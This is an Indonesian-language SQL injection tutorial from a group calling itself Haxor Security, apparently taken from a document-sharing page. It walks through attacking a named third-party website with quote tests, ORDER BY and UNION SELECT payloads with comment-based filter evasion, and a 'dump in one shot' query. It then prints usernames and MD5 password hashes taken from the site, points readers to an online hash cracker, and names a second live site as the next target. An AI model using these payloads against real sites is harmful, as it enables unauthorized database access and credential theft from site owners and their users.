Haxor SQLi Dios

SQL INJECTION MANUAL
Haxor Security
Sultan Rizky Alveira

PEMBUKAAN
Assalamualaikum , Sebelum nya kita pasti sudah pernah mengenal
apa itu sql injection dan untuk yang belum mengenal mari kita bahas
sedikit.
Sql injection : Adalah sebuah serangan injeksi yang dapat

menimbulkan ancaman keamanan yang serius pada WebApllication,
Yang dimana sql injection mengijinkan penyerang untuk mendapatkan
hak database yang dapat menyebabkan hilangnya kerahasiaan data
terutama pada data yang sensitif di antaranya username dan password
pengguna.
Biasanya serangan sql injection akan ditandai dengan diberikannya

input string / single quote ( ‘ ) lalu web akan menampilkan pesan error
seperti you have an error in your sql syntax , celah ini disebabkan oleh
tidak adanya penanganan terhadap karakter-karakter tanda petik dan
tanda minus yang menyebabkan suatu Web dapat disusupi peritah sql.
SKENARIO PENETRASI
SQL INJECTION INTERALIA PROJECT
Pada kesempatan ini saya akan mencoba melakukan penetrasi sql

injection pada website http://www.interaliaproject.com
Gambar .1 Tampilan Berita

http://www.interaliaproject.com/news.php?id=115
Langkah-Langkah yang dilakukan dalam menemukan bug sql injection

adalah sebagai berikut:
1. Mencoba memasukan sebuah karakter tanda kutip ( ‘ ) pada
halaman tersebut untuk mengecek vulnerability, dengan
contoh sebagai berikut pada Gambar .2
Gambar .2 Tampilan Berita
http://www.interaliaproject.com/news.php?id=115’
Percobaan ini ternyata berhasil dan diperoleh pesan error pada

gambar.2
2. Percobaan selanjutnya kita mencari letak error untuk mencari

kolom database nya dan saya sudah mencari dan menemukan
error diangka 7 . menggunakan payloads berikut:
Payloads:
 http://www.interaliaproject.com/news.php?id=115%27+order
+by+1+--+ NULL
+by+2+--+ NULL
+by+3+--+ NULL
+by+4+--+ NULL
+by+5+--+ NULL
+by+6+--+ NULL
+by+7+--+ ERROR
Kita menemukan error diangka 7 yang berarti letak kolom nya
diangka 6
3. Oke sekarang kita akan mencari angka ajaib atau angka yang
menunjukan letak database nya, dengan payloads sebagai
berikut:
Payloads: http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6+--+
Gambar .3 Tampilan Angka Letak Database

http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6+--+
Yups disini muncul beberapa angka , kita ambil angka yang cukup
jelas yaitu angka 3
4. Selanjutnya kita mencoba memasukan Dios(Dump In One Shot)

kedalam angka letak database tersebut yaitu angka 3, payloads
dan dios nya seperti berikut:
Dios:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schem
a.columns)where(table_schema=database())and(0x00)in(@x:=concat
+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Payloads:
http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(sel
ect(@x:=0x00),(select(0)from(information_schema.columns)where(t
able_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,t
able_name,0x203a3a20,column_name))))x),4,5,6+--+
Yap kita berhasil memunculkan databasenya dengan payloads diatas,

dan ini mengadung data sensitif yang seharusnya tidak orang lain
tahu lihat pada gambar .4
Gambar .4 Tampilan Database

Dari tabel database diatas kita mendapatkan informasi seperti:
[*] usertable :: username
[*] usertable :: password
5. Kita mencoba menDump/menampilkan username dan
password dengan payloads sebagai berikut, Dan lihat pada
gambar .5
Payloads: http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,group_concat(user
name,0x3a,password),4,5,6+from+usertable+--+
Gambar .5 Tampilan username dan password
Disini kita mendapatkan beberapa user dan password sebagai

berikut:
Usename :: Password
- Interalia :: 010f052b09867307a98f7c744e0f0106
- antonis :: cd64c618627016120817ca5eaeb9a29e
Nah password diatas masih berbentuk md5 yang harus kita hash,
jangan khawatir kita hanya tinggal copy dan pastekan di web online
www.hashkiller.co.uk/Cracker/MD5
PENUTUP
Jika kalian sudah paham dengan tutorial materi diatas, kita belajar
bersama dengan target berikutnya
http://ubraintv.com/watchchannel.php?id=6
Oke sekian dulu materi kali ini mohon maaf apabila penjelasan ini
kurang dipahami jika ada pertanyaan apapun bisa ditanyakan
langsung di forum diskusi grup. Untuk materi selanjutnya saya sultan
rizky akan membahas tentang sql injetion with sqlmap .
Note*
Terimakasih kepada tim admin haxor yang telah membantu
berjalannya materi ini, tidak lupa untuk member haxor security untuk
tetap belajar oke. Dan tolong untuk para pro player untuk tidak
merendah share ilmu kalian agar lebih bermanfaat.
Instagram: @haxor_sec
Web : http://www.haxorsec.net
Fanspage : Haxor Security
SUPPORTED BY :

Haxor SQLi Dios

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Haxor SQLi Dios

Diunggah oleh

Hak Cipta:

Format Tersedia

SQL INJECTION MANUAL

Sultan Rizky Alveira

Sql injection : Adalah sebuah serangan injeksi yang dapat

Biasanya serangan sql injection akan ditandai dengan diberikannya

Pada kesempatan ini saya akan mencoba melakukan penetrasi sql

Gambar .1 Tampilan Berita

Langkah-Langkah yang dilakukan dalam menemukan bug sql injection

Percobaan ini ternyata berhasil dan diperoleh pesan error pada

2. Percobaan selanjutnya kita mencari letak error untuk mencari

Gambar .3 Tampilan Angka Letak Database

4. Selanjutnya kita mencoba memasukan Dios(Dump In One Shot)

Yap kita berhasil memunculkan databasenya dengan payloads diatas,

Gambar .4 Tampilan Database

Gambar .5 Tampilan username dan password

Disini kita mendapatkan beberapa user dan password sebagai

Anda mungkin juga menyukai